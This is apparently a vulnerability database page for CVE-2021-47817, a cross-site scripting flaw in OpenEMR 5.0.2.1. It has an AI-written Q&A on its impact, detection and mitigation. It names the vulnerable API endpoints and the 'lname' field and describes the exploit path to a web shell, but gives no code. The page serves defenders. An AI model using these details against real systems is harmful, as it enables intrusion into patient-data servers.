CVE-2021-47817
BaseFortify
Publication date: 2026-01-21
Last updated on: 2026-02-02
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| open-emr | openemr | 5.0.2.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows authenticated attackers to inject malicious JavaScript and execute remote commands on the OpenEMR system, potentially compromising sensitive patient data and system integrity. Such a compromise could lead to violations of data protection regulations like GDPR and HIPAA, which mandate the protection of personal health information and require maintaining confidentiality and integrity of patient data. Therefore, exploitation of this vulnerability could negatively impact compliance with these common standards and regulations by exposing protected health information to unauthorized access or manipulation. [2, 5]
Can you explain this vulnerability to me?
CVE-2021-47817 is a cross-site scripting (XSS) vulnerability in OpenEMR version 5.0.2.1 that allows authenticated attackers to inject malicious JavaScript code through user profile parameters. The injected script executes in the context of an administrator's browser, enabling the attacker to download and execute a web shell on the server. This web shell allows remote command execution on the vulnerable OpenEMR instance, effectively giving the attacker control over the server. The attack requires network access, low attack complexity, and user interaction. [2, 4]
How can this vulnerability impact me? :
This vulnerability can lead to remote code execution on the OpenEMR server, allowing attackers to execute arbitrary system commands. This compromises the confidentiality and integrity of sensitive patient data and can lead to full server takeover. Attackers can inject malicious scripts that download a PHP web shell, enabling persistent unauthorized access and control over the affected system. This poses significant risks to the security and availability of the healthcare data and infrastructure. [2, 4, 5]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection involves monitoring for unusual API requests to OpenEMR endpoints such as `/portal/patient/api/users/` and `/portal/patient/api/user/{id}` that may indicate attempts to enumerate users or inject malicious payloads. Additionally, inspecting HTTP requests for suspicious PUT requests modifying user profile parameters (e.g., the 'lname' field) with embedded JavaScript can help identify exploitation attempts. Since the exploit uses authenticated sessions, reviewing logs for unexpected authenticated API activity or unusual session initialization requests to `login.php` and `register.php` may be useful. Specific commands are not provided in the resources, but network monitoring tools or web application firewalls can be configured to alert on these suspicious patterns. [4]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include applying the vendor's security patches, specifically upgrading OpenEMR from version 5.0.2.1 to a patched version such as 5.0.2.2 that addresses this vulnerability. Additionally, restrict access to the Patient Portal API to trusted users, enforce strong authentication, and monitor for suspicious activity. Applying input sanitization and output encoding (e.g., using PHP's htmlspecialchars() function) to user profile parameters can prevent script injection. Disabling or restricting backup features that allow command execution until patched is also recommended. Finally, review and harden API permissions to prevent unauthorized access. [5]